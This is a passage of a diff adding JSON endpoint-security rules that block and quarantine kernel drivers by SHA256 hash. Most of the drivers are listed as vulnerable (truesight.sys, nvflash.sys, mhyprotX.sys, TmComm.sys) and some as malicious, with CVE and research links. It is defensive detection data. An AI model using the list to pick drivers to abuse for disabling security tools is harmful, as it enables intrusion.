+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487916Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b49574345aac6924339f555e06ad0cb4ba8c36dca6403a6d9388174dcf76efd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6cb540bb-f386-56a4-a700-6c0292258494",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618925Z",
+ "creation_date": "2026-03-23T11:45:29.618927Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "989e3234c1b61ea2db590cb170f79e25e9c9a6262b7b9a751ecfc6bf4468b8c4",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6cbb6b5c-18ca-52ad-ad7c-61f99d1dfd36",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159264Z",
+ "creation_date": "2026-03-23T11:45:31.159266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159272Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1435428af7ccb2ae2fbe1e581f4ad7c38bfaa5367e9bbe29f9732f838a84500",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6cc7ec1e-58cd-57d3-9105-e395944ef424",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452461Z",
+ "creation_date": "2026-03-23T11:45:30.452465Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23be3616a4fb4e620f971e4348dc46b7980abca6463be3cb4b83769a955f2810",
+ "comment": "Vulnerable Kernel Driver (aka Chaos-Rootkit.sys) [https://www.loldrivers.io/drivers/abcd2c10-1078-4cf9-b320-04ca38d22f98/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6cddd27c-2273-5e09-b052-dfeb5279592d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819673Z",
+ "creation_date": "2026-03-23T11:45:30.819675Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "060d25126e45309414b380ee29f900840b689eae4217a8e621563f130c1d457f",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6cedc317-06d0-5f0d-90f8-b68f58eb38a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832133Z",
+ "creation_date": "2026-03-23T11:45:30.832135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2749d7e7af1d4a0152ab690eaff93c17ffc587e203cec960a4e82eddee86147a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6cfca489-3930-5253-b47a-3f779247c35b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616860Z",
+ "creation_date": "2026-03-23T11:45:29.616864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616885Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9022cdd52aa3420757d5c16fe61a4fd4d538fe74981ddf3f29de00eb7a3be849",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d0cbf53-cde9-501b-b716-1eec52f624b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494169Z",
+ "creation_date": "2026-03-23T11:45:31.494172Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b64faa54484770a73e4e87f633374b409904997fbcb47da8af94a7f081661519",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d20b998-3850-5bb5-bf4a-9d9c7a8be162",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619018Z",
+ "creation_date": "2026-03-23T11:45:29.619020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab3fe6cbd9e3d70a64c5f3b186126cc38a04a624ceefc46afe4825f2001a3caa",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d2c0441-4717-560a-a346-1d3e65715b25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612198Z",
+ "creation_date": "2026-03-23T11:45:29.612200Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612205Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d4049c5-6b9d-5196-a6ce-a26937a5c190",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817399Z",
+ "creation_date": "2026-03-23T11:45:30.817401Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2381e9fc518488f51e3ec49d5ca4e59d10727d20678067ca147e50b0c4294f9a",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d40b5b8-74bc-57c2-b973-563a0ede62e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144521Z",
+ "creation_date": "2026-03-23T11:45:32.144523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d8bc539ca7c72e552b7065d2a84fef43b75a46a53c82b50556c2984e0a86a9e",
+ "comment": "Malicious Kernel Driver (aka driver_4d8bc539.sys) [https://www.loldrivers.io/drivers/e7fd8ffc-ab37-4a7b-8dc9-fc7432fbacae/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d458b79-b71a-5b0f-965c-fcdb16621ee7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475060Z",
+ "creation_date": "2026-03-23T11:45:31.475064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92a0fba8c1598f73e1021e5e4607a7cfab6ed1cef1056d2a1bcdec47dd55391d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d465f08-a4f5-5e97-8fe8-058827ee4c6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143150Z",
+ "creation_date": "2026-03-23T11:45:32.143152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4160dae22484062ccc3750cc9cac8f929d8701694160a3b508715610814aa28d",
+ "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d4764b3-5c35-5b66-b82b-bca5f7c65c3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145377Z",
+ "creation_date": "2026-03-23T11:45:31.145379Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcb2cd8c703f3b378be66a6a5f5283e9393a280df68a6b8f9d227c6aa8b92824",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d69fe65-8b59-5e30-9de0-a7635a77ae83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156021Z",
+ "creation_date": "2026-03-23T11:45:31.156022Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "821401e4becfc52522485719c8f5375889e7d4281c6d76bdb76ccfa332e8a102",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d874781-b2b2-56d9-a9a5-9efd07a1acd9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452942Z",
+ "creation_date": "2026-03-23T11:45:30.452954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c5aef14613b8471f5f4fdeb9f25b5907c2335a4bc18b3c2266fb1ffd8f1741d",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d9369f3-485c-5c87-b526-a40568e50bc1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974766Z",
+ "creation_date": "2026-03-23T11:45:29.974768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974774Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45624a7469927b999cce153ff0074f675a8c062c5afa3f0c688b6124874ca27a",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d95c489-0cc2-57f1-858a-c57a0e76f43c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606629Z",
+ "creation_date": "2026-03-23T11:45:29.606631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0fb06748758082263e252050904f2fd8a29a77ae71dfdb390346bd2046ebfd4",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d97e72c-1f6b-57b2-84d1-f6e068b79040",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823526Z",
+ "creation_date": "2026-03-23T11:45:31.823529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823538Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "316dab59da430edeb47e6d2a95e7f4a6cee385be96353340151a606e05b4d8cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6da2bf15-5dfa-55d4-8d7e-e22051c03e66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824189Z",
+ "creation_date": "2026-03-23T11:45:31.824192Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c83986522ab62386c1568b4cd7ab597b72e6022bdbc63bb7a9fc634138c59467",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6da649c5-2a75-5528-8ca6-cafc8ba21aa7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834996Z",
+ "creation_date": "2026-03-23T11:45:30.834999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b6af15d8afb49cecd9803a72ed7598b9cd4b2725a2df9e73decca0f7ddd9e81",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6da6ea9a-fc0c-526f-b061-075b7ccf4d62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145094Z",
+ "creation_date": "2026-03-23T11:45:32.145096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
